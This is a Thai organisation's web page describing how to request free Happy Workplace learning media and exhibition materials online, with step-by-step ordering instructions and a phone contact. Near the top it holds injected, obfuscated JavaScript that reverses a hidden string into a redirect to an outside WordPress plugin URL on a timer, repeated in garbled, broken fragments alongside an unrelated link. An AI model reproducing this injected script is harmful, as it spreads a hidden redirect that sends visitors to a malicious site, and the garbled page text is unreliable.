การติดต่อขอสื่อ

ท่านสามารถขอสื่อความรู้Happy workplace ผ่านระบบออนไลน์ได้แล้วที่

$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=[“‘php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and.cochranfirmcriminaldefense.com">www.marylandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and.cochranfirmcriminaldefense.com  -----> หัวข้อ “ขอสื่อ

mix book

ขั้นตอนการขอสื่อ

  • เข้าหัวข้อ       “ขอสื่อ”

  • เลือกหนังสือที่ต้องการ “หยิบใส่ตะกร้า”

  • อ่านรายละเอียดหนังสือและ ใส่เลข จำนวนที่ต้องการขอ (โดยเลือกได้ไม่เกิน 10 เล่ม

  • เมื่อเลือกหนังสือตามที่ต้องการ คลิ๊กเลือกที่

  • กรอกรายละเอียดผู้ขอ และวุตถุประสงค์การใช้งาน

  • คลิ๊กส่งแบบฟอร์ม

  • รอรับอีเมล์ตอบกลับการอนุมัติเบิก

  • ศูนย์ Happy workplace center จัดส่งสื่อตามอนุมัติ ผ่านไปรษณีย์ไทย หรือ ให้ท่านดินทางมารับเอง

ศูนย์ Happy Workpalce Center มีสื่อนิทรรศการ บริการให้ยืมฟรี แก่องค์กรที่สนใจ

กรุณาติดต่อ โทรศัพท์: 02-035-6311

แบบฟอร์มเบิกสื่อ

ตย.สื่อนิทรรศการ

BACK DROP

Screen Shot 2556-08-20 at 12.58.11 AM

STANDY

Screen Shot 2556-08-20 at 1.03.58 AM Screen Shot 2556-08-20 at 1.04.09 AM